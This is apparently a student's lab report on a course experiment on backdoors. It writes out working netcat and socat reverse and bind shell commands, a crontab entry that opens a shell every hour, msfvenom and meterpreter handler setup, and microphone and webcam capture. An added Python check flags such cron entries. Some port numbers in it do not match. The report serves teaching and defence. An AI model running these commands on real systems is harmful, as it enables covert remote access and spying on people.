20174307 Zhou Junkai: Experiment 2, Backdoor Principles and Practice

Experiment name

        Backdoor Principles and Practice.

Principle

        A backdoor is a procedure or method that bypasses security controls to obtain access to a system; through it, the normal authentication path can be bypassed to gain access to the system.

        From the attacker's point of view, using a backdoor to break into a target host or server first requires a program with backdoor functionality. There are many such programs, including the netcat family, Meterpreter, INTERSECT, Windows Update and others. Next, the backdoor has to be placed on the target system in some way: copying it directly from a USB flash drive, phishing sites, binding it to legitimate software, sending it by e-mail, brute-force attacks and other means. Then the backdoor has to be made to run: it can be set to start at boot, started by a scheduled task, started in association with another program, and so on, so that the backdoor runs on the target system and the attacker can operate on the target host with all of the backdoor's permissions. Finally, to keep the backdoor usable over time, it must avoid removal by antivirus software (anti-detection techniques for malicious code) and keep its connection stable so that it is not blocked by the firewall (tunnelling, encrypted connections, reverse connections).

 Experimental purposes and requirements

    · Grasp the concept of a backdoor and general knowledge of common backdoor types, and understand in depth how backdoors work.

    · Master several common backdoors and learn to use backdoor tools for basic tasks.

    · Strengthen information-security awareness, recognising the dangers of backdoors and raising vigilance against them.

 NC or netcat

          Also known as nc or ncat.

          Windows obtains a Linux shell

          On Windows, use ipconfig to view the local IP.

           On Kali, connect back to Windows with ncat 192.168.132.1 5322 -e /bin/sh; the -e option runs the shell program.

           A Linux shell is obtained on Windows, and any command can be run, such as ls.

         Linux obtains a Windows shell

                On the Linux side, enter ip addr; the IP address is 192.168.181.129.

                  Start listening: nc -l -p 4307.

                  On Windows, connect back to Kali: ncat.exe -e cmd.exe 192.168.181.129 4307

                  Kali successfully obtains a Windows command prompt.

Meterpreter

  • Is a backdoor program.
  • The traditional understanding is: someone writes a backdoor and we make use of it.
  • Later, some experts wanted to write a platform that generates backdoors. This platform makes the backdoor's
    • basic functions (basic connectivity, executing instructions),
    • extensions (such as collecting user information, installing services and other functions),
    • encoding mode,
    • operating platform,
    • and operating parameters
  • partly or wholly adjustable parameters. Combining them as needed generates an executable file.

 

Use netcat to obtain the host's shell, started by cron
                  crontab sets instructions to be executed periodically. On the Linux side:

                 Enter crontab -e to add a cron task; choose editor 3.

                 Add 35 * * * * /bin/netcat 192.168.181.1 4307 -e /bin/sh on the last line, meaning that at minute 35 of every hour it connects back to port 5301 on the Windows host; then save and exit.

                 When 20:35 arrives, verify on the Windows side.

Use socat to obtain the host's shell, started by a scheduled task

                 socat is an enhanced version of ncat; it relays bidirectional data between two independent data channels. These data channels include files, pipes, devices and so on. Its main feature is establishing a data flow between two channels, and it supports many protocols and link types such as ip, tcp, udp and ipv6.

                 Download the socat archive on the Windows side.

                 In Windows, click [Computer] - [Manage] - [Task Scheduler] - [Task Scheduler Library] and select [Create Task].

                    Create a trigger.

                    When completing the Actions step, add the parameters tcp-listen:4307 exec:cmd.exe,pty,stderr. This action binds cmd.exe to port 5302 and redirects cmd.exe's stderr to stdout.

                        You can see the task is ready.

                         At 20:50 a cmd window pops up together with a firewall prompt; select [Allow access]. On the Linux side enter socat - tcp:192.168.181.1:<port> to complete the connection and obtain a Windows shell.

Use MSF meterpreter to generate an executable, transfer it to the host with ncat, and obtain the host's shell

                         On Linux, generate the backdoor with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe

                         The program is generated successfully.

                         On Linux, use msfconsole to enter the msf console and type the following commands:

                         Use the listener module and set the payload: use exploit/multi/handler

                         Use the same payload as the generated backdoor: set payload windows/meterpreter/reverse_tcp

                         IP address of the Linux host: set LHOST 192.168.132.138

                         Use the same port: set LPORT 5322

                         Start listening: exploit

Use MSF meterpreter to obtain the target host's audio, camera, keylogger and other content, and attempt privilege escalation

                       Continue from the connection step above.

 · Enter the command record_mic -d 15 in the Kali terminal to capture 15 seconds of audio input.

                         Enter the command webcam_snap to take a picture with the camera.

Questions and answers

        1. Give examples of ways a backdoor could get onto your system.

         A: A backdoor is installed along with pirated or cracked software.

        2. Give examples of ways a backdoor can be started (Windows and Linux).

         A: Linux: started on a crontab schedule; injected shellcode.

               Windows: a new scheduled task; modifying a registry key so the backdoor starts at boot; the user running a file that carries the backdoor.

        3. Which Meterpreter functions left a deep impression on you?

          A: Being able to control the camera and audio.

        4. How can you find out whether a backdoor has been installed on your system?

           A: Detect it with specialised software; check whether there are unknown services; check whether there are unknown startup items.
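As an added example (not part of the original report) of the "unknown startup items" check in this answer on the Linux side: a small Python audit that reads crontab text and flags entries that start netcat, ncat or socat with a command bound to a socket, which is exactly the shape of the cron entry used in the experiment above. The crontab sample is constructed for this example.

```python
import re
import shlex
from dataclasses import dataclass

# Hypothetical audit helper written for this report; not part of netcat, socat or cron.
NETCAT_NAMES = {"nc", "ncat", "netcat", "socat"}
SHELL_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
SOCAT_SHELL = re.compile(r"^(exec|system):", re.IGNORECASE)

# Constructed sample crontab: two benign jobs plus persistence entries like the experiment's.
SAMPLE_CRONTAB = """\
# constructed sample, mirrors the experiment's cron entry plus benign jobs
SHELL=/bin/bash
0 2 * * * /usr/bin/rsync -a /home /backup
35 * * * * /bin/netcat 192.168.181.1 4307 -e /bin/sh
@reboot /usr/bin/socat tcp-listen:4307 exec:/bin/sh,pty,stderr
*/10 * * * * /usr/bin/nc -z backup.internal 22
"""

@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reason: str

def _split_entry(line):
    """Return (schedule, command) for a cron entry, or None for blanks, comments and env lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
        return None
    if stripped.startswith("@"):            # @reboot, @hourly, ... have one schedule field
        parts = stripped.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = stripped.split(None, 5)         # five time fields, then the command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]

def audit_crontab(text):
    """Flag scheduled commands that run a netcat-style tool, with a reason for each."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = _split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        try:
            argv = shlex.split(command)
        except ValueError:                  # unbalanced quotes: fall back to whitespace split
            argv = command.split()
        for i, tok in enumerate(argv):
            if tok.rsplit("/", 1)[-1] not in NETCAT_NAMES:
                continue
            rest = argv[i + 1:]
            if any(a in SHELL_FLAGS for a in rest):
                reason = "netcat-style tool with -e/-c: a command is bound to the socket"
            elif any(SOCAT_SHELL.match(a.split(",")[0]) for a in rest):
                reason = "socat with exec:/system: address: a command is bound to the socket"
            else:
                reason = "netcat-style tool scheduled by cron; review manually"
            findings.append(Finding(no, schedule, command, reason))
            break
    return findings
```

A real audit would read every user's crontab plus /etc/crontab and /etc/cron.d and pair this with the "unknown services" check from the same answer.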

Experimental thoughts

         The experiment is not difficult, but the effect it achieved shocked me: I did not think it was so simple to get into other people's computers and take screenshots or even record video. This made me more aware of the importance of studying my major seriously, and I also realised that all kinds of backdoor Trojans flood the network; in future I will be more cautious when browsing or downloading, and pay more attention to the importance of regular antivirus scans.


Origin www.cnblogs.com/zhoujunkai/p/12522221.html